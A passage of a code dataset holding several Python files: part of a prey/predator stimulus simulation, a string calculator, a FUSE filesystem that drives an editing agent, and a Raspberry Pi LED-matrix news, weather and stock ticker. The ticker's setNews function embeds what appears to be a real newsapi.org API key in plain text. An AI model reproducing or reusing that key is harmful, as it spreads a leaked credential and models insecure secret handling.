int(interval / 3)\n else:\n current_steps = (current_steps % interval) - (interval * 2/3)\n if \"prey\" in stimulus:\n sizes = np.linspace(5, 15, int(interval / 3) + 1)\n elif \"predator\" in stimulus:\n sizes = np.linspace(40, 80, int(interval/3)+1)\n else:\n print(\"Error\")\n sizes = np.linspace(5, 15, int(interval / 3) + 1)\n\n if self.moving_stimuli == \"Towards\":\n progression = int(current_steps)\n elif self.moving_stimuli == \"Away\":\n progression = int(round((interval/3)-current_steps))\n else:\n print(\"Wrong motion parameter\")\n progression = 0\n return self.get_distance_for_size(stimulus, sizes[progression])\n\n def update_unset_stimuli(self):\n # TODO: Still need to update so that can have multiple, sequential stimuli. Will require adding in onset into stimulus, as well as changing the baseline phase. 
Not useful for current requirements.\n stimuli_to_delete = []\n init_period = 100 # TODO: Parameterise\n\n for stimulus in self.unset_stimuli.keys():\n i = int(stimulus.split()[1]) - 1\n if self.num_steps <= init_period:\n # Networks initialisation period\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n else:\n\n if (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == 0:\n # Initialisation period\n self.stimuli_information[stimulus][\"Initialisation\"] = self.num_steps\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n\n elif (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == round(self.unset_stimuli[stimulus][\"interval\"]/3):\n # Pre onset period\n self.stimuli_information[stimulus][\"Pre-onset\"] = self.num_steps\n if \"prey\" in stimulus:\n self.prey_bodies[i].position = (10, 10)\n elif \"predator\" in stimulus:\n self.predator_bodies[i].position = (10, 10)\n\n elif (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"] == round(2 * self.unset_stimuli[stimulus][\"interval\"]/3):\n # Appearance period\n if self.unset_stimuli[stimulus][\"steps\"]-init_period > (self.num_steps-init_period):\n d = self.get_distance_for_size(stimulus, self.unset_stimuli[stimulus][\"size\"])\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period))\n self.place_on_curve(stimulus, i, d, theta)\n self.stimuli_information[stimulus][\"Onset\"] = self.num_steps\n self.stimuli_information[stimulus][\"Angle\"] = theta\n self.stimuli_information[stimulus][\"Size\"] = self.unset_stimuli[stimulus][\"size\"]\n\n if self.moving_stimuli:\n if self.moving_stimuli == \"Left\" or self.moving_stimuli == \"Right\":\n self.stimuli_information[stimulus][\"Direction\"] = self.moving_stimuli\n time = self.unset_stimuli[stimulus][\"interval\"]/3\n theta2 = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period) + self.unset_stimuli[stimulus][\"interval\"]/3)\n d_moved = self.get_distance_moved_on_arc(theta, theta2, d)\n self.stimuli_information[stimulus][\"Velocity\"] = d_moved/time\n elif self.moving_stimuli == \"Towards\" or self.moving_stimuli == \"Away\":\n self.stimuli_information[stimulus][\"Direction\"] = self.moving_stimuli\n time = self.unset_stimuli[stimulus][\"interval\"] / 3\n d2 = self.get_new_distance(stimulus, self.unset_stimuli[stimulus][\"interval\"], round((self.num_steps-init_period) + self.unset_stimuli[stimulus][\"interval\"]/3))\n d_moved = abs(d2 - d)\n self.stimuli_information[stimulus][\"Velocity\"] = d_moved/time\n else:\n print(\"Invalid *moving* parameter given\")\n else:\n self.stimuli_information[stimulus][\"Finish\"] = self.num_steps\n stimuli_to_delete.append(stimulus)\n\n else:\n if self.moving_stimuli and self.unset_stimuli[stimulus][\"interval\"] * 2/3 < (self.num_steps-init_period) % self.unset_stimuli[stimulus][\"interval\"]:\n if self.moving_stimuli == \"Left\" or self.moving_stimuli == \"Right\":\n d = self.get_distance_for_size(stimulus, self.unset_stimuli[stimulus][\"size\"])\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-init_period, (self.num_steps-init_period))\n self.place_on_curve(stimulus, i, d, theta)\n elif self.moving_stimuli == \"Towards\" or self.moving_stimuli == \"Away\":\n d = 
self.get_new_distance(stimulus, self.unset_stimuli[stimulus][\"interval\"], (self.num_steps-init_period))\n steps_for_angle = round(((self.num_steps-init_period)//self.unset_stimuli[stimulus][\"interval\"] * self.unset_stimuli[stimulus][\"interval\"]) + (2 * self.unset_stimuli[stimulus][\"interval\"] / 3))\n theta = self.get_new_angle(self.unset_stimuli[stimulus][\"steps\"]-100, steps_for_angle)\n self.place_on_curve(stimulus, i, d, theta)\n else:\n print(\"Invalid *moving* parameter given\")\n\n self.stimuli_information[stimulus] = {}\n for stimulus in stimuli_to_delete:\n del self.unset_stimuli[stimulus]\n\n def update_stimuli(self):\n \"\"\"For use with set positioned stimuli.\"\"\"\n finished_prey = []\n finished_predators = []\n for i, prey in enumerate(self.prey_positions):\n try:\n self.prey_bodies[i].position = (self.prey_positions[prey][self.num_steps][0],\n self.prey_positions[prey][self.num_steps][1])\n except IndexError:\n self.prey_bodies.pop(i)\n self.prey_shapes.pop(i)\n finished_prey.append(prey)\n\n for i, predator in enumerate(self.predator_positions):\n try:\n self.predator_bodies[i].position = (self.predator_positions[predator][self.num_steps][0],\n self.predator_positions[predator][self.num_steps][1])\n except IndexError:\n self.predator_bodies.pop(i)\n self.predator_shapes.pop(i)\n finished_predators.append(predator)\n\n for item in finished_prey:\n del self.prey_positions[item]\n for item in finished_predators:\n del self.predator_positions[item]\n\n def create_positional_information(self, stimuli):\n for stimulus in stimuli:\n edge_index = 0\n if \"prey\" in stimulus:\n self.prey_positions[stimulus] = []\n while edge_index + 1 < len(stimuli[stimulus]):\n positions = self.interpolate_stimuli_positions(stimuli[stimulus], edge_index)\n self.prey_positions[stimulus] = self.prey_positions[stimulus] + positions\n edge_index += 1\n elif \"predator\" in stimulus:\n self.predator_positions[stimulus] = []\n while edge_index + 1 < len(stimuli[stimulus]):\n positions = self.interpolate_stimuli_positions(stimuli[stimulus], edge_index)\n self.predator_positions[stimulus] = self.predator_positions[stimulus] + positions\n edge_index += 1\n\n @staticmethod\n def interpolate_stimuli_positions(stimulus, edge_index):\n a = stimulus[edge_index][\"position\"]\n b = stimulus[edge_index + 1][\"position\"]\n t_interval = stimulus[edge_index + 1][\"step\"] - stimulus[edge_index][\"step\"]\n dx = (b[0] - a[0])/t_interval\n dy = (b[1] - a[1])/t_interval\n interpolated_positions = [[a[0]+dx*i, a[1]+dy*i] for i in range(t_interval)]\n return interpolated_positions\n","sub_path":"Environment/controlled_stimulus_environment_continuous.py","file_name":"controlled_stimulus_environment_continuous.py","file_ext":"py","file_size_in_byte":19193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336881621","text":"class Calculator:\n\tdef __init__(self, Input):\n\t\tInput = Input.replace(\" \", \"\") #Removing spaces to make it less complicated. \n\t\tinputList = [y for x,y in enumerate(Input)] #Making a list of all letters of the Input.. For Example 2+2 = ['2', '+', '2']\n\t\tself.numList = [] \n\t\tself.opList = [] #op stands for operator \n\t\tself.tempNum = ''\n\t\tself.N = ['1','2','3','4','5','6','7','8','9','0', '.'] #Accepted Characters for input as a number. 
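\n\t\t# Quick sketch: Calculator(\"2+3*4\").result evaluates to 14.0, because solve()\n\t\t# below applies the ^, /, *, + and - passes in that precedence order.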
\n\t\tnumList, opList = self.formNumber(inputList) # Splitting inputList into numList, opList; e.g. for 2+2, numList = ['2', '2'], opList = ['+']\n\t\tnumList, opList = self.solve(numList, opList)\n\t\twhile ('+' in opList) or ('-' in opList) or ('*' in opList) or ('/' in opList) or ('^' in opList):\n\t\t\tnumList, opList = self.solve(numList, opList)\n\t\tself.result = numList[0]\n\n\tdef solveBrackets(self, Input):\n\t\tinputList = [y for x,y in enumerate(Input)]\n\t\tnumList, opList = [], []\n\t\ttempNum = ''\n\t\tfor y,x in enumerate(inputList):\n\t\t\tif str(x) in self.N:\n\t\t\t\ttempNum += str(x)\n\t\t\telse:\n\t\t\t\tif tempNum != '':\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\ttempNum = ''\n\t\t\t\topList.append(x)\n\t\t\tif y+1 == len(inputList):\n\t\t\t\tif tempNum != '':\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\ttempNum = ''\n\t\tnumList, opList = self.solve(numList, opList)\n\t\twhile ('+' in opList) or ('-' in opList) or ('*' in opList) or ('/' in opList) or ('^' in opList):\n\t\t\tnumList, opList = self.solve(numList, opList)\n\t\treturn numList[0]\n\n\tdef formNumber(self, inputList):\n\t\ttempNum = ''\n\t\tnumList = []\n\t\topList = []\n\t\tbrackets = False\n\t\tfor y,x in enumerate(inputList):\n\t\t\tif str(x) == '(':\n\t\t\t\tbrackets = True \n\t\t\t\tcontinue \n\t\t\telif str(x) == ')':\n\t\t\t\tbrackets = False \n\t\t\t\ttempNum = self.solveBrackets(tempNum)\n\t\t\t\tnumList.append(tempNum)\n\t\t\t\tcontinue\n\t\t\tif brackets:\n\t\t\t\ttempNum += str(x)\n\t\t\telse:\n\t\t\t\tif str(x) in self.N:\n\t\t\t\t\ttempNum = tempNum + str(x) \n\t\t\t\telse:\n\t\t\t\t\tif tempNum != '':\n\t\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\t\ttempNum = ''\n\t\t\t\t\topList.append(x)\n\t\t\t\tif y+1 == len(inputList):\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\t\ttempNum = ''\n\t\treturn numList, opList \n\n\tdef solve(self, numList, opList):\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y == '^':\n\t\t\t\tnumList[x] = float(numList[x]) ** numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y == '/':\n\t\t\t\tnumList[x] = float(numList[x]) / numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y == '*':\n\t\t\t\tnumList[x] = float(numList[x]) * numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y == '+':\n\t\t\t\tnumList[x] = float(numList[x]) + numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y == '-':\n\t\t\t\tnumList[x] = float(numList[x]) - numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\treturn numList, opList \n\nwhile True:\n\ttry:\n\t\tcal = Calculator(raw_input(\"Enter An Equation: \")) # You may need to change raw_input to input if you are using Python 3\n\t\tprint(cal.result)\n\texcept:\n\t\tprint(\"Sorry, there's an error\")\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"644576020","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\nsys.path+=['..']\nfrom RTEAgent import *\nimport threading\n\nfrom collections import defaultdict\nfrom errno import ENOENT,EACCES\nfrom stat import S_IFDIR, S_IFLNK, S_IFREG\nfrom sys import argv, exit\nfrom time import time\n\nfrom fuse import 
FUSE, Operations, LoggingMixIn, FuseOSError\n\nif not hasattr(__builtins__, 'bytes'):\n bytes = str\n\nclass RTEAThread( threading.Thread ):\n def __init__( self, rteFS, rteAgent,filename, contents ):\n threading.Thread.__init__(self)\n self.rteFS = rteFS\n self.rteAgent = rteAgent\n self.filename = filename\n self.contents = contents\n def run( self ):\n logging.debug(\"Compile thread compiling, from change in file \"+self.filename)\n self.rteAgent.input( self.filename, self.contents )\n self.rteFS.files['/input']['st_mode'] = (S_IFDIR | 0o777)\n logging.debug(\"Compile thread finished\")\n \nclass RTEFS(LoggingMixIn, Operations):\n 'FS for control of the Real-Time Editing agent, drawing from the fusepy Example memory filesystem.'\n\n def __init__(self, agent):\n self.files = {}\n self.data = defaultdict(bytes)\n self.fd = 0\n now = time()\n self.files['/'] = dict(st_mode=(S_IFDIR | 0o777), st_ctime=now,\n st_mtime=now, st_atime=now, st_nlink=2)\n self.files['/input'] = dict(st_mode=(S_IFDIR | 0o777), st_ctime=now,\n st_mtime=now, st_atime=now, st_nlink=2)\n self.agent = agent\n \n def chmod(self, path, mode):\n self.files[path]['st_mode'] &= 0o770000\n self.files[path]['st_mode'] |= mode\n return 0\n\n def chown(self, path, uid, gid):\n self.files[path]['st_uid'] = uid\n self.files[path]['st_gid'] = gid\n\n def create(self, path, mode):\n self.files[path] = dict(st_mode=(S_IFREG | mode), st_nlink=1,\n st_size=0, st_ctime=time(), st_mtime=time(),\n st_atime=time())\n\n self.fd += 1\n return self.fd\n\n def getattr(self, path, fh=None):\n if path[0:7] == \"/input/\":\n st = os.lstat(agent.cwd + path[6:])\n self.files[path] = dict((key, getattr(st, key)) for key in ('st_atime', 'st_ctime',\n 'st_gid', 'st_mode', 'st_mtime', 'st_nlink',\n 'st_size', 'st_uid'))\n return self.files[path]\n if path not in self.files:\n raise OSError(ENOENT)\n\n return self.files[path]\n\n def getxattr(self, path, name, position=0):\n attrs = self.files[path].get('attrs', {})\n\n try:\n return attrs[name]\n except KeyError:\n return '' # Should return ENOATTR\n\n def listxattr(self, path):\n attrs = self.files[path].get('attrs', {})\n return attrs.keys()\n\n def mkdir(self, path, mode):\n self.files[path] = dict(st_mode=(S_IFDIR | mode), st_nlink=2,\n st_size=0, st_ctime=time(), st_mtime=time(),\n st_atime=time())\n\n self.files['/']['st_nlink'] += 1\n\n def open(self, path, flags):\n self.fd += 1\n return self.fd\n\n def read(self, path, size, offset, fh):\n return self.data[path][offset:offset + size]\n\n def readdir(self, path, fh):\n return ['.', '..'] + [x[1:] for x in self.files if x != '/']\n\n def readlink(self, path):\n return self.data[path]\n\n def removexattr(self, path, name):\n attrs = self.files[path].get('attrs', {})\n\n try:\n del attrs[name]\n except KeyError:\n pass # Should return ENOATTR\n\n def rename(self, old, new):\n self.files[new] = self.files.pop(old)\n\n def rmdir(self, path):\n self.files.pop(path)\n self.files['/']['st_nlink'] -= 1\n\n def statfs(self, path):\n return dict(f_bsize=512, f_blocks=4096, f_bavail=2048)\n\n def symlink(self, target, source):\n self.files[target] = dict(st_mode=(S_IFLNK | 0o777), st_nlink=1,\n st_size=len(source))\n\n self.data[target] = source\n\n def truncate(self, path, length, fh=None):\n self.data[path] = self.data[path][:length]\n self.files[path]['st_size'] = length\n\n def unlink(self, path):\n self.files.pop(path)\n\n def utimens(self, path, times=None):\n now = time()\n atime, mtime = times if times else (now, now)\n 
self.files[path]['st_atime'] = atime\n        self.files[path]['st_mtime'] = mtime\n\n    def write(self, path, data, offset, fh):\n        self.data[path] = self.data[path][:offset] + data\n        self.files[path]['st_size'] = len(self.data[path])\n        return len(data)\n\n    def release( self, path, fh ):\n        #logging.debug(\"Releasing path : \"+path)\n        #logging.debug(\"Data at the end of interaction is :\"+self.data[path])\n        if path[0:7] == '/input/':\n            #logging.debug(\"input file written, let's launch the whole shebang\")\n            #Input file written\n            #We remove writing rights to /input/ to prevent further editing\n            self.files['/input']['st_mode'] = (S_IFDIR | 0000)\n            #We launch the thread that will give them back\n            RTEAThread( self, self.agent,path[7:],self.data[path] ).start()\n            #TODO: We should check if a previous compilation is still running\n            #logging.debug(\"thread started, returning\")\n            #Give back control to user\n        return 0\n\n    def access( self, path, mode ):\n        logging.debug(\"Calling access on \"+path)\n        if path[0:6] == '/input':\n            logging.debug(\"Checking whether /input can be accessed\")\n            if self.files['/input']['st_mode'] == (S_IFDIR | 0000):\n                logging.debug(\"Nope\")\n                raise FuseOSError(EACCES)\n            logging.debug(\"Yep\")\n        return 0\n    \n\n\n    \nif __name__ == '__main__':\n    if len(argv) != 2:\n        print('usage: %s <mountpoint>' % argv[0])\n        exit(1)\n\n    logging.getLogger().setLevel(logging.INFO) #Or DEBUG ...\n    logging.debug(\"Launching the agent\")\n    agent = RTEAgent()\n    fuse = FUSE(RTEFS( agent ), argv[1], foreground=True,auto_xattr=True)\n    \n\n","sub_path":"RTEFS.py","file_name":"RTEFS.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"135337590","text":"#!/usr/bin/python\nfrom rgbmatrix import Adafruit_RGBmatrix\n\"\"\"\nclass Adafruit_RGBmatrix(): # Debug environment\n    def __init__(self, a=None, b=None): \n        return\n    def Clear(self):\n        return\n    def SetImage(self, a, b, c):\n        return\n\"\"\"\n\nimport socket\norigGetAddrInfo = socket.getaddrinfo\ndef getAddrInfoWrapper(host, port, family=0, socktype=0, proto=0, flags=0):\n    return origGetAddrInfo(host, port, socket.AF_INET, socktype, proto, flags)\nsocket.getaddrinfo = getAddrInfoWrapper\n\nimport Image\nimport ImageDraw\nimport ImageFont\n\nimport textwrap\nfrom datetime import datetime\nfrom time import gmtime, strftime\nimport time\n\nimport glob\nimport json\nimport logging\nimport os\nimport platform\nimport sys\nimport threading\nimport urllib, urllib2\n\nlogging.basicConfig(level=logging.DEBUG,format='[%(levelname)s] (%(threadName)-10s) %(message)s',)\n\ndef internetOn():\n    try:\n        urllib2.urlopen('http://216.58.192.142', timeout=2)\n        return True\n    except urllib2.URLError as err:\n        return False\n\nclass MainThread():\n    ############################################################\n    # Constructor\n    ############################################################ \n    def __init__(self):\n        self.sleep = 0.01\n        self.text = None\n        try:\n            if ( platform.system() == \"Darwin\" ):\n                self.font = ImageFont.truetype('/Library/Fonts/Arial Bold.ttf', 24)\n            else:\n                self.font = ImageFont.truetype('/usr/share/fonts/truetype/droid/DroidSansFallbackFull.ttf', 24)\n        except:\n            logging.debug( platform.system() )\n            self.font = None\n        self.image_text = None\n        self.news = None\n        self.stock = None\n        self.weather = None\n        self.weatherlogo = None\n        self.weathertext = None\n        self.weathertime = os.path.getmtime(\"weather/weather.json\")\n        self.default = None\n        \n        ## Events
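\n        # threading.Event flags coordinate the display thread, the reload thread and the console loop\n        self.stop_event = 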
threading.Event()\n self.stop_event.clear()\n self.input_event = threading.Event()\n self.input_event.clear()\n self.news_event = threading.Event()\n self.news_event.clear()\n self.nyan_event = threading.Event()\n self.nyan_event.clear()\n self.print_event = threading.Event()\n self.print_event.set()\n self.stock_event = threading.Event()\n self.stock_event.clear()\n self.stop_prompt = threading.Event()\n self.stop_prompt.clear()\n\n self.reload_thread = threading.Thread(target = self.reload, name = \"Reload Thread\")\n self.reload_thread.setDaemon(True)\n self.reload_thread.start()\n\n time.sleep(3)\n self.setImage()\n self.prompt_thread = threading.Thread(target = self.printout, name = \"Prompt Thread\")\n self.prompt_thread.setDaemon(True)\n self.prompt_thread.start()\n \n\n ############################################################\n # Thread settings\n ############################################################\n\n # Print Default\n def printout(self):\n while not self.stop_event.is_set():\n # Input event\n if self.input_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing input: \" + str(self.text) )\n self.setImage(self.text)\n self.prompt(True, False)\n \n # If there are input while prompt\n #if self.stop_prompt.is_set() and self.input_event.is_set():\n if self.input_event.is_set():\n logging.debug(\"New input while print. Continue: \" + str(self.text) )\n continue\n logging.debug(\"End printing input: \" + str(self.text) )\n self.text = None\n # Back to print mode\n self.input_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # News event\n elif self.news_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing news: \" + str(self.text) )\n self.printNews()\n \n self.text = None\n self.setImage()\n self.stop_prompt.clear()\n logging.debug(\"End news mode.\")\n # Back to print mode\n self.news_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n \n # Nyan event\n elif self.nyan_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Nyan event\")\n self.printNyan()\n # If there are any input while prompt\n if self.stop_prompt.is_set() and self.nyan_event.is_set():\n logging.debug(\"New nyan request while print. Continue\" )\n continue\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n continue\n logging.debug(\"End printing nyan\" )\n # Back to print mode\n self.nyan_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # Stock event\n elif self.stock_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing stock: \" + str(self.stock) )\n self.printStock()\n \n self.text = None\n self.setImage()\n self.stop_prompt.clear()\n logging.debug(\"End stock mode.\")\n # Back to print mode\n self.stock_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # Print event\n elif self.print_event.is_set():\n self.stop_prompt.clear()\n self.print_event.wait()\n logging.debug(\"Printing default image: \" + str(self.text))\n self.setImage()\n self.prompt()\n\n # Else (silent mode)\n else:\n logging.debug(\"No mode is turned on! 
Wait until print_event is on.\")\n self.print_event.wait()\n \n # Reload Image\n def reload(self):\n while not self.stop_event.is_set():\n self.print_event.wait()\n try:\n logging.debug(\"Reloading Image: \" + str(self.image_text))\n except:\n logging.debug(\"Reloading Image/Not promptable\")\n self.setWeather()\n #self.setImage()\n self.setDefaultImage()\n #self.image.save(\"testing2.png\", \"PNG\")\n time.sleep(1)\n\n \n ############################################################\n # User Facing commands\n ############################################################\n def input(self, input):\n self.print_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.text = input\n self.input_event.set()\n\n def readNews(self):\n self.print_event.clear()\n self.nyan_event.clear()\n self.input_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.news_event.set()\n raw_input('News mode. Press anything to continue...')\n logging.debug(\"Exit news mode triggered\")\n self.stop_prompt.set()\n #self.news_event.clear()\n\n def readStock(self):\n self.print_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.input_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.stock_event.set()\n raw_input('Stock mode. Press anything to continue...')\n logging.debug(\"Exit stock mode triggered\")\n self.stop_prompt.set()\n\n def reset(self):\n logging.debug(\"Return to regular state\")\n matrix.Clear()\n self.input_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n self.print_event.set()\n\n\n def nyan(self):\n logging.debug(\"Nyan mode\")\n self.print_event.clear()\n self.input_event.clear()\n self.news_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n self.nyan_event.set()\n matrix.Clear()\n\n \n def silent(self):\n self.print_event.clear()\n self.input_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n raw_input('Silent mode. Press anything to continue...')\n self.stop_prompt.clear()\n self.print_event.set()\n\n def setSpeed(self, char):\n if char is \"+\":\n self.sleep -= 0.005 if self.sleep > 0.00005 else 0\n #self.sleep = self.sleep - 0.005 if self.sleep > 0.1 else 0.005\n if char is \"-\":\n self.sleep += 0.005 if self.sleep < 1 else 0\n #self.sleep = self.sleep + 0.05 if self.sleep < 5 else 4.95\n logging.debug(str(self.sleep))\n\n def stop(self):\n self.stop_event.set()\n \n ############################################################\n # Methods\n ############################################################\n \n def setImage(self, default=None):\n global rasplogo,akamailogo\n\n # Set word text\n userinput = default or \"This is Akamai Cambridge Security Operation Command Center (SOCC). 
\" + strftime(\"%H:%M:%S %Z\", time.localtime()) + strftime(\" (%H:%M:%S GMT)\", time.gmtime())\n self.image_text = userinput\n text = self.textToImage(userinput)\n textwidth = text.size[0]\n\n # Set logo\n akamaiwidth = akamailogo.size[0]\n raspwidth = rasplogo.size[0]\n\n # Set weather\n weather = self.weather\n weatherlogo = self.weatherlogo\n weatherwidth = None if weather is None else weather.size[0] \n weatherlogowidth = None if weatherlogo is None else weatherlogo.size[0]\n weathertext = None or self.weathertext\n if weathertext is not None:\n self.image_text = userinput + \" \" + weathertext\n\n # Set width\n width = 10 + akamaiwidth + 10 + textwidth + 10 + raspwidth + 10\n width += weatherlogowidth + 10 + weatherwidth + 10 if weather is not None and weatherlogo is not None else 0\n width *= 2 if default is None else 1\n self.width = width\n\n # Create final image\n image = Image.new(\"RGBA\", (width, 32))\n temp = 10\n image.paste(akamailogo,(temp,0))\n temp += akamaiwidth + 10 \n image.paste(text, (temp,0))\n temp += textwidth + 10\n image.paste(rasplogo, (temp, 0))\n if weather is not None and weatherlogo is not None and default is None:\n temp += raspwidth + 10\n image.paste(weather, (temp, 0))\n temp += weatherwidth + 10\n image.paste(weatherlogo, (temp, 0))\n if default is None:\n image.paste(image, ( width/2 ,0))\n self.image = image\n\n \n def setDefaultImage(self):\n global akamailogo\n if self.default is None:\n self.setImage()\n self.default = self.image\n userinput = \"This is Akamai Cambridge Security Operation Command Center (SOCC). \" + strftime(\"%H:%M:%S %Z\", time.localtime()) + strftime(\" (%H:%M:%S GMT)\", time.gmtime())\n text = self.textToImage(userinput)\n textloc1 = 10 + akamailogo.size[0] + 10\n textloc2 = 10 + akamailogo.size[0] + 10 + self.default.size[0] / 2\n self.image = self.default\n self.image.paste(text, (textloc1,0))\n self.image.paste(text, (textloc2,0))\n\n\n\n\n \n def setNews(self):\n self.news = None\n file = \"news/news.json\"\n key = \"06e1a2dceeba46c89de4eecc8aaf24c0\"\n #url = \"https://newsapi.org/v1/articles?source=google-news&sortBy=top&apiKey=\" + key\n url = \"https://newsapi.org/v1/articles?source=the-next-web&sortBy=latest&apiKey=\" + key\n duration = 60 * 30 # 30 Minutes\n filelastupdate = time.time() - os.path.getmtime(file)\n logging.debug(\"json file too old? 
\" + str(filelastupdate ) + \" > \" + str(duration) + \": \" + str(filelastupdate > duration))\n if filelastupdate > duration: # json file too old?\n try:\n urllib.urlretrieve( url, file) # Try fetch json file\n logging.debug(\"Obtained news json.\")\n except:\n logging.debug(\"Could not load article.\")\n else:\n logging.debug(\"Using old json file.\")\n # Get weather information\n try:\n newsfile = open(file)\n newsjson = json.load(newsfile)\n self.news = [entry[\"description\"] for entry in newsjson[\"articles\"]]\n #self.news = newsjson[\"articles\"]\n logging.debug(str(self.news))\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n logging.debug(\"Ending print news\")\n\n def setStock(self):\n self.stock = None\n file = \"stock/stock.json\"\n stocktype = [\"INDEXDJX:%20.DJI\", \"INDEXNASDAQ:%20.IXIC\", \"INDEXSP:%20.INX\", \"NASDAQ%3aAKAM\"]\n stocknames = [\"INDEXDJX\", \"INDEXNASDAQ\", \"INDEXSP\", \"AKAM\"]\n url = \"https://finance.google.com/finance?output=json&q=\"\n duration = 60 * 10 # 10 Minutes\n filelastupdate = time.time() - os.path.getmtime(file)\n logging.debug(\"json file too old? \" + str(filelastupdate) + \" > \" + str(duration) + \": \" + str(filelastupdate > duration))\n if filelastupdate > duration: # json file too old?\n stockdata = []\n try:\n for stock, stockname in zip(stocktype, stocknames):\n stockname = \"stock/\" + stockname + \".json\"\n logging.debug(\"Obtaining stockname: \" + stockname)\n logging.debug(\"URL: \" + url + stock)\n data = urllib2.urlopen( url + stock ).read().replace(\"//\", \"\")\n stockdata.append(json.loads(data)[0])\n logging.debug(\"Data persable.\")\n with open(file, 'w') as filename:\n json.dump(stockdata, filename, sort_keys=True, indent=4)\n except:\n logging.debug(\"Unable to obtain new json.\")\n try:\n with open(file, 'r') as filename:\n stockjson = json.load(filename)\n stockname = [\"DOW\",\"NASDAQ\",\"S&P\",\"AKAM\"]\n getlist = lambda x: [entry[x] for entry in stockjson]\n lists = [stockname, getlist(\"l\"), getlist(\"c\"), getlist(\"cp\")]\n result = {z[0]:list(z[1:]) for z in zip (*lists)}\n self.stock = result\n logging.debug(str(self.stock))\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n logging.debug(\"Ending print stock\")\n \n def setStockImage(self):\n global rasplogo,akamailogo, up, down\n # Set logo\n akamaiwidth = akamailogo.size[0]\n raspwidth = rasplogo.size[0]\n\n # Initial width\n width = 0\n self.image_text = \"\"\n imagelist = []\n\n for stockname, stockinfo in self.stock.iteritems():\n # Price\n price = stockname + \" \" + stockinfo[0] + \" \"\n self.image_text += price\n priceimage = self.textToImage(price, \"white\")\n\n # Price Change\n pricec = stockinfo[1] + \" (\" + stockinfo[2] + \" %)\"\n self.image_text += pricec\n color = \"green\" if float(stockinfo[1]) >= 0 else \"red\"\n updown = up if color is \"green\" else down\n pricecimage = self.textToImage(pricec, color)\n\n # Set width\n pricewidth = priceimage.size[0] + 10 + updown.size[0] + 10 + pricecimage.size[0]\n\n tempwidth = 10 + akamaiwidth + 10 + pricewidth + 10 + raspwidth + 10\n # Create image\n tempimage = Image.new(\"RGBA\", (tempwidth, 32))\n width += tempwidth\n\n temp = 10\n tempimage.paste(akamailogo,(temp,0))\n temp += akamaiwidth + 10 \n tempimage.paste(priceimage, (temp,0))\n temp += priceimage.size[0] + 10\n tempimage.paste(updown, (temp,0))\n temp += updown.size[0] + 
